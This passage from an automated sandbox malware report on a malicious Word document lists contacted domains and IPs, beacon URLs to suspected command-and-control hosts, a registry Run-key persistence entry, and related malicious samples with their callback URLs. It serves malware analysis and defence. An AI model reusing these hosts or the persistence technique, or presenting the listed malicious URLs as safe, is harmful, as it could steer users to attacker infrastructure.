            sea-shared-5.masterns.com
            		104.168.198.45
            		truetrue
              		unknown
              akasyaofistasima.com
              		89.252.180.207
              		truefalse
                		unknown
                ext-sq.squarespace.com
                		198.49.23.141
                		truefalse
                  		high
                  www.akasyaofistasima.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.mycapecrusade.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.musmarservices.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.runwithit.media
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.runwithit.media/bu43/?Yzrx=5vpVtqJ3i14TYLjahre3JpaYS6Wcf4IPAkG7pj5paeEEzi6lwzUZWwRsk9qYR19+9CpDRA==&OBZPd=k6AhchXHBBtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.opel-occasions-ales.com/bu43/?OBZPd=k6AhchXHBB&Yzrx=UiBHsTvAEQLKMdFr/hj1g9PdhtcWl8ZZ/ysXuG6Tr8ng0KhPmhT7mwdkGkewJ6JbNyjYEA==true
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://search.chol.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://www.mercadolivre.com.br/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://search.ebay.de/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              http://www.mtv.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                		high
                                http://www.rambler.ru/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://www.nifty.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://www.dailymail.co.uk/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www3.fnac.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000007.00000000.2179041046.000000000842E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.2180621064.000000000861C000.00000004.00000001.sdmpfalse
                                        		high
                                        http://buscar.ya.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://search.yahoo.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://www.iis.fhg.de/audioPAexplorer.exe, 00000007.00000000.2151899014.0000000004B50000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sogou.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://asp.usatoday.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://fr.search.yahoo.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://rover.ebay.comexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://in.search.yahoo.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      		high
                                                      http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        		high
                                                        http://search.ebay.in/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://%s.comexplorer.exe, 00000007.00000000.2189757519.000000000A330000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		low
                                                          http://msk.afisha.ru/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            		high
                                                            http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://search.rediff.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://www.windows.com/pctv.explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.ya.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://it.search.dada.net/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://search.naver.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.google.ru/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://search.hanafos.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.abril.com.br/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://search.daum.net/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://search.naver.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.clarin.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            http://buscar.ozu.es/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://kr.search.yahoo.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              http://search.about.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                		high
                                                                                http://busca.igbusca.com.br/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000007.00000000.2147725228.00000000041AD000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.ask.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.priceminister.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.cjmall.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://search.centrum.cz/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://suche.t-online.de/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.google.it/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://search.auction.co.kr/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://www.ceneo.pl/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.amazon.de/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.2180035893.000000000856E000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://sads.myspace.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://google.pchome.com.tw/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.rambler.ru/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://uk.search.yahoo.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://espanol.search.yahoo.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.ozu.es/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://search.sify.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://openimage.interpark.com/interpark.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://search.ebay.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.gmarket.co.kr/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://search.nifty.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://searchresults.news.com.au/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://www.google.si/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.google.cz/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.soso.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.univision.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://search.ebay.it/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.asharqalawsat.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://busca.orange.es/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000007.00000000.2189757519.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://search.yahoo.co.jpexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          http://www.target.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://buscador.terra.es/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            http://search.orange.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            http://www.iask.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            http://www.tesco.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://cgi.search.biglobe.ne.jp/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://search.seznam.cz/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://suche.freenet.de/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://search.interpark.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://investor.msn.com/explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://search.espn.go.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://www.myspace.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://search.centrum.cz/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://p.zhongsou.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://service2.bfast.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown

                                                                                                                                                            Contacted IPs

                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                            Public

                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                            198.49.23.141
                                                                                                                                                            		unknownUnited States
                                                                                                                                                            		53831SQUARESPACEUSfalse
                                                                                                                                                            104.168.198.45
                                                                                                                                                            		unknownUnited States
                                                                                                                                                            		54290HOSTWINDSUStrue
                                                                                                                                                            34.102.136.180
                                                                                                                                                            		unknownUnited States
                                                                                                                                                            		15169GOOGLEUStrue
                                                                                                                                                            50.117.11.156
                                                                                                                                                            		unknownUnited States
                                                                                                                                                            		18779EGIHOSTINGUStrue

                                                                                                                                                            General Information

                                                                                                                                                            Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                            Analysis ID:323039
                                                                                                                                                            Start date:26.11.2020
                                                                                                                                                            Start time:08:43:14
                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 12m 43s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:full
                                                                                                                                                            Sample file name:VOMAXTRADING.doc
                                                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                            Number of analysed new started processes analysed:16
                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:1
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • HDC enabled
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal100.troj.expl.evad.winDOC@18/9@6/4
                                                                                                                                                            EGA Information:Failed
                                                                                                                                                            HDC Information:
                                                                                                                                                            • Successful, ratio: 27.7% (good quality ratio 26.2%)
                                                                                                                                                            • Quality average: 72.7%
                                                                                                                                                            • Quality standard deviation: 29.4%
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                            • Number of executed functions: 112
                                                                                                                                                            • Number of non-executed functions: 129
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Adjust boot time
                                                                                                                                                            • Enable AMSI
                                                                                                                                                            • Found application associated with file extension: .doc
                                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                            • Attach to Office via COM
                                                                                                                                                            • Active ActiveX Object
                                                                                                                                                            • Scroll down
                                                                                                                                                            • Close Viewer
                                                                                                                                                            Warnings:
                                                                                                                                                            Show All
                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                            • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                            Simulations

                                                                                                                                                            Behavior and APIs

                                                                                                                                                            TimeTypeDescription
                                                                                                                                                            08:43:38API Interceptor212x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                            08:43:40API Interceptor143x Sleep call for process: skypound83892.exe modified
                                                                                                                                                            08:44:04API Interceptor148x Sleep call for process: explorer.exe modified
                                                                                                                                                            08:44:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run firefos "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe"
                                                                                                                                                            08:44:18API Interceptor162x Sleep call for process: firefos.exe modified
                                                                                                                                                            08:44:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run firefos "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe"
                                                                                                                                                            08:44:35API Interceptor145x Sleep call for process: NAPSTAT.EXE modified

                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                            IPs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            198.49.23.141Shipment Document BLINV And Packing List Attached.exeGet hashmaliciousBrowse
                                                                                                                                                            • www.susanchanportfolio.com/bg8v/?Jt7=XPv4nH2h&DXIXO=HyGhRbWfA/FjtePjF60/Hc9K7f/HLZoAUl0QDlng8HnZdTYXC39X56Ix73zgUKPHMNJb
                                                                                                                                                            1Bn2brrsT7.exeGet hashmaliciousBrowse
                                                                                                                                                            • www.zuriadesign.com/glt/?FTClCFf=yfSrxjb7pvJn3pa9/UpiGW3aD6nrgJu4fpTkyRsv8UAcTOXkLgP/fm0SlF4jVAWqeTR2&uRipW=7nGxF
                                                                                                                                                            NQQWym075C.exeGet hashmaliciousBrowse
                                                                                                                                                            • www.ussouthernhome.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB
                                                                                                                                                            vOKMFxiCYt.exeGet hashmaliciousBrowse
                                                                                                                                                            • www.themaskedstitcher.com/glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnP
                                                                                                                                                            BANK ACCOUNT INFO!.exeGet hashmaliciousBrowse
                                                                                                                                                            • www.katrinarask.com/sbmh/?FPWlMXx=W647QVGGXcyuIQJd2YRsV4l3KrBdlR6nE0kWwxhnTOMt1o1EWv0jVtfUgI2cf5E+EjKE&AlO=O2JtmTIX2
                                                                                                                                                            Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                                                                                                                            • www.floresereis.com/gyo3/?Ez=PS6J2QmalNJ2YJDjbe69AvUeFdUcpOy/3pEgziSDPBkUWsWS6mOmijOfudAWg7zfBEC1B5r2MQ==&lhud=TjfdU2S
                                                                                                                                                            http://f69e.engage.squarespace-mail.comGet hashmaliciousBrowse
                                                                                                                                                            • f69e.engage.squarespace-mail.com/
                                                                                                                                                            dB7XQuemMc.exeGet hashmaliciousBrowse
                                                                                                                                                            • www.missteenroyaluniverse.com/nt8e/?wfv=ZReo2Pt2Qe1/UCtjKFtXHq3RWUOi2Gm/wCbn0tZxqkEIYA02TnYAkFkYrty+KIrZCZ6r&Tj=yrIt
                                                                                                                                                            hRVrTsMv25.exeGet hashmaliciousBrowse
                                                                                                                                                            • www.qlifepharmacy.com/hko6/?XVJpkDH8=GNi/DpI/o0IU2mlIts+MFBAG9T0dMGL590B2ep5La5xhQGCr0BB5YDI5YioaKEegNoVx&V8-DC=02JL1VL0CDLPLTE0
                                                                                                                                                            NzI1oP5E74.exeGet hashmaliciousBrowse
                                                                                                                                                            • www.kayapallisgaard.com/igqu/?v6=+FdV/Kd4fGUiBuWYNlWEm7YK8cxavEbtySDgdYvfxIiidE6desXWnlu2B7HA/iyauFln7ZyoAg==&1b=V6O83JaPw
                                                                                                                                                            PO.exeGet hashmaliciousBrowse
                                                                                                                                                            • www.unusualdawg.com/9d1o/?1bm=QkXoOVVmg24y7wxEBap6bO8f6UGaNui7YjNJ7V3V8x8CyLlwzZoXh9kyUu+YoqOVbj3TZFChrA==&sZRd=pBiHDjuxCVPXGhYp
                                                                                                                                                            KZ7qjnBlZF.exeGet hashmaliciousBrowse
                                                                                                                                                            • www.haloheartdachshunds.com/sub/?ndndn4=RVlTij&AR5=XFWzbX0ToqWBjEsf26ufL7Xq5jBuxaIMiFZhysx3UIjI7XvmT/Bu5040hGTugKhDCWzPxOW3Cg==
                                                                                                                                                            104.168.198.45MIC Taiwan RFQ.docGet hashmaliciousBrowse
                                                                                                                                                            • mangero.ml/dchampx/dchamp.exe

                                                                                                                                                            Domains

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            ext-sq.squarespace.comanthon.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.141
                                                                                                                                                            Shipment Document BLINV And Packing List Attached.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            1Bn2brrsT7.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            NQQWym075C.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            kayx.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.141
                                                                                                                                                            BANK ACCOUNT INFO!.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            http://f69e.engage.squarespace-mail.comGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            dB7XQuemMc.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            hRVrTsMv25.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            v6k2UHU2xk.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.141
                                                                                                                                                            NzI1oP5E74.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            PO.exeGet hashmaliciousBrowse
